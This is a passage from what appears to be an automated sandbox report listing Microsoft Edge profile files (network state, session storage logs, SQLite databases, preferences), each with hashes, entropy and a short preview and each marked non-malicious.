                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7c6a35b6-c7f0-454f-a540-5dded7656014.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                    MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                    SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                    SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                    SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\887cbb47-7fc4-4448-b851-ec61ca9b23ac.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):144
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                    MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                    SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                    SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                    SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF46628.TMP (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):2
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                    MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                    SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                    SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                    SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:[]

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):36864
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                    MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                    SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                    SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                    SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\a15f2fbf-63e9-44b4-9b04-c6c55c5269b1.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                    MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                    SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                    SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                    SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):80
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                    MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                    SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                    SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                    SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.24834078849334
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:iwSAv4YebvqBZFUt8drC1/+dP5LYebvqBaJ:Iy4Yebvyg8pCkLYebvL
                                                                                                                                                                                                                                                                                    MD5:3AB618A29B0D9FB06D1CC43CD7790AAB
                                                                                                                                                                                                                                                                                    SHA1:007EF83B3528F3048E13EB58ED77C656F9B124A1
                                                                                                                                                                                                                                                                                    SHA-256:83B38F610D26BAB9A9453C4BDBD85814FC1A609924D4A7778708F9070D79E232
                                                                                                                                                                                                                                                                                    SHA-512:B932723E6DB485F309C8250ACFBD7B5FF658E848DAAEBD6FEDC3DBB2BB6B2090DD7FAC19BDD9BCB962D8083B76B49DE998188E1157B4D0643AA9FF92273CAA8C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:30.545 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-08:47:30.546 1070 Recovering log #3.2024/12/27-08:47:30.549 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):422
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.24834078849334
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:iwSAv4YebvqBZFUt8drC1/+dP5LYebvqBaJ:Iy4Yebvyg8pCkLYebvL
                                                                                                                                                                                                                                                                                    MD5:3AB618A29B0D9FB06D1CC43CD7790AAB
                                                                                                                                                                                                                                                                                    SHA1:007EF83B3528F3048E13EB58ED77C656F9B124A1
                                                                                                                                                                                                                                                                                    SHA-256:83B38F610D26BAB9A9453C4BDBD85814FC1A609924D4A7778708F9070D79E232
                                                                                                                                                                                                                                                                                    SHA-512:B932723E6DB485F309C8250ACFBD7B5FF658E848DAAEBD6FEDC3DBB2BB6B2090DD7FAC19BDD9BCB962D8083B76B49DE998188E1157B4D0643AA9FF92273CAA8C
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:30.545 1070 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-08:47:30.546 1070 Recovering log #3.2024/12/27-08:47:30.549 1070 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.169708197349163
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLUk+q2P923oH+TcwtpIFUt8doLveZZmw+doLveNVkwO923oH+Tcwta/WLJ:ixv4YebmFUt8d66/+d6G5LYebaUJ
                                                                                                                                                                                                                                                                                    MD5:135AFDE3636CFCE80136369FAE51120E
                                                                                                                                                                                                                                                                                    SHA1:66B4FD27C0A81B6031CC85923E0017BBF55BA404
                                                                                                                                                                                                                                                                                    SHA-256:A3EFE79C2C3F9D5781D76BAA514090A6554F262A64847AA9224044C40749759F
                                                                                                                                                                                                                                                                                    SHA-512:26EA6971DC9442A191A1B42342672772E16C7BAC94E782097D11EFCA0B255C9D04A8029D055E7785A0E79B19FAECBE75734C741D9E13A6600E12B27F730F3099
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.728 1aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-08:47:11.729 1aa8 Recovering log #3.2024/12/27-08:47:11.729 1aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):328
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.169708197349163
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLUk+q2P923oH+TcwtpIFUt8doLveZZmw+doLveNVkwO923oH+Tcwta/WLJ:ixv4YebmFUt8d66/+d6G5LYebaUJ
                                                                                                                                                                                                                                                                                    MD5:135AFDE3636CFCE80136369FAE51120E
                                                                                                                                                                                                                                                                                    SHA1:66B4FD27C0A81B6031CC85923E0017BBF55BA404
                                                                                                                                                                                                                                                                                    SHA-256:A3EFE79C2C3F9D5781D76BAA514090A6554F262A64847AA9224044C40749759F
                                                                                                                                                                                                                                                                                    SHA-512:26EA6971DC9442A191A1B42342672772E16C7BAC94E782097D11EFCA0B255C9D04A8029D055E7785A0E79B19FAECBE75734C741D9E13A6600E12B27F730F3099
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:11.728 1aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-08:47:11.729 1aa8 Recovering log #3.2024/12/27-08:47:11.729 1aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):196608
                                                                                                                                                                                                                                                                                    Entropy (8bit):1.265343899664204
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVum0:Bq+n0JX9ELyKOMq+8y9/Owr
                                                                                                                                                                                                                                                                                    MD5:30F72208E8643B2A6F79AA94A1576084
                                                                                                                                                                                                                                                                                    SHA1:082D95A9E8C064A535B0F0AC8E8E1200A4B3E4C1
                                                                                                                                                                                                                                                                                    SHA-256:D9D596EA9F42475B8D92381C33616E86D1C43A50D734EBE2A5035063B72F2D26
                                                                                                                                                                                                                                                                                    SHA-512:728C8D718351ADEC4205072BB2FB63781C8FA848F8DC35930F931AF236084ABD4BA788DE59C060114391CD1AD6F179FE42087F9F11DFA48010CDDAA243EAA9FF
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40960
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4671391673205292
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0MOS:v7doKsKuKZKlZNmu46yjx0Y
                                                                                                                                                                                                                                                                                    MD5:12AF04934BF91AC758E93C15ABA3463C
                                                                                                                                                                                                                                                                                    SHA1:A84864508A31BD16307F176AC138E20C21ADA773
                                                                                                                                                                                                                                                                                    SHA-256:13E24A97B44C261C114F8B8C385316FE1A2F5A148E9A714DAA535F874253C67A
                                                                                                                                                                                                                                                                                    SHA-512:861EB371CC19D59937DD0D24C6D1F6D93BAD3AAF38D833EB43D4C24D7B2D310B756A071B913F366608D941E9E944556EB632A49E51E704BECE4DAD3EE3A21584
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):12824
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.13716403274660352
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:folvHNllv/etXlfnols/34//l/h4jRfn1d7jdtQfjl3t3JlsXtXlfI:QvSlv4w4puj3dndmld4lg
                                                                                                                                                                                                                                                                                    MD5:0E72F4FDE42152E98F1CC91A08C5D674
                                                                                                                                                                                                                                                                                    SHA1:F16CEB822830F58BC84CC5F05F347F8226795546
                                                                                                                                                                                                                                                                                    SHA-256:EF7ABABFFE394BACA6809B43F9C31722CAD8E3751EBFA31C319A13D287F76936
                                                                                                                                                                                                                                                                                    SHA-512:4699F778B2B3B8127DAD84D682422A5F77F814211D2C2316D8CE3BD291105FD63D606D25C129458C4201A4DECD86426AB45EF296275E94F0F6E20731FB49FFE0
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:............j...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\af3ad00f-d166-440a-9314-920ea90d11cc.tmp

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (17498), with no line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):17498
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.485527646353999
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:384:st5PGQSu4IsJHFfhxDo7InTwbGrQw26WSiaTYM:szOXu6lffotbGEt+iaTYM
                                                                                                                                                                                                                                                                                    MD5:112DB781D996372FD4868D9019155A6A
                                                                                                                                                                                                                                                                                    SHA1:7CCF1D7694C9DFA520F815EDF83F4062BF57DDE9
                                                                                                                                                                                                                                                                                    SHA-256:35EB6A43D802C362B3A52A64280F8F88C302EEF7A5EE26ABEA17FC58EE872865
                                                                                                                                                                                                                                                                                    SHA-512:4DCCBF909718666C1E0D60D7FF308BFE5BA698A2066E11EFE83C608C729B6DB69EEB204BFC79506EF49E914DA29E7C88FDB09092AD73C76AA690DDA1D622AA4D
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379780832328356","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\arbitration_service_config.json

                                                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (3951), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):11755
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.190465908239046
                                                                                                                                                                                                                                                                                    Encrypted:false
